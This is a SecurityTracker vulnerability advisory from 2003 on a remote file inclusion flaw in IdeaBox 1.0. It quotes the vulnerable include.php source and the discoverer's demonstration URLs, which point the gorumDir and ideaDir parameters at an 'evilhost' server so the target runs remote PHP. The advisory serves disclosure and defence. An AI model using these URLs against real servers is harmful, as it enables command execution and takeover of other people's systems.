SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Ideabox Vendors:   PhpOutsourcing
PHPOutsourcing Ideabox Include File Errors Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1006681
SecurityTracker URL:  http://securitytracker.com/id/1006681
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 30 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0
Description:   Some include file vulnerabilities were reported in PHPOutsourcing's Ideabox. A remote user can execute arbitrary commands on the target server.

F0KP reported that the include.php script does not properly validate user-supplied variables. A remote user can submit a specially crafted URL that will cause the target server to include and execute PHP code located on a remote server. The executed PHP code can contain operating system commands.

A demonstration exploit URL that will execute PHP code located at http://evilhost/notification.php is provided:

http://[target]/ideabox/include.php?gorumDir=http://evilhost

The 'ideaDir' variable is also affected.

Impact:   A remote user can execute arbitrary PHP commands, including operating system commands, on the target server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  ideabox.phpoutsourcing.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  IdeaBox: Remote Command Execution


=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: IdeaBox: Remote Command Execution
product: IdeaBox 1.0
vendor: http://ideabox.phpoutsourcing.com
risk: high
date: 04/25/2k3
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/022.en.txt
               http://f0kp.iplus.ru/bz/022.ru.txt 
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

IdeaBox 1.0 have a multiple include bugs. For example, 
this is include.php source code:

<?php
include("$gorumDir/generformlib_date.php");
include("$gorumDir/notification.php");
include("$ideaDir/user.php");
include("$ideaDir/globalsettings.php");
include("$ideaDir/init.php");
include("$ideaDir/idea.php");
include("$ideaDir/history.php");
include("$ideaDir/cord.php");
?>


Evil surfer can exploit this hole as following:

http://hostname/ideabox/include.php?gorumDir=http://evilhost
with http://evilhost/notification.php

or 

http://hostname/ideabox/include.php?ideaDir=http://evilhost
with http://evilhost/cord.php

shouts: DWC, DHG, HUNGOSH, security.nnov.ru, Black Tigerz Research Group,
The N0b0D1eS, all russian security guyz!! to kate especially )) 
hates: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb 
team
          

================
im not a lame,
not yet a hacker
================


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC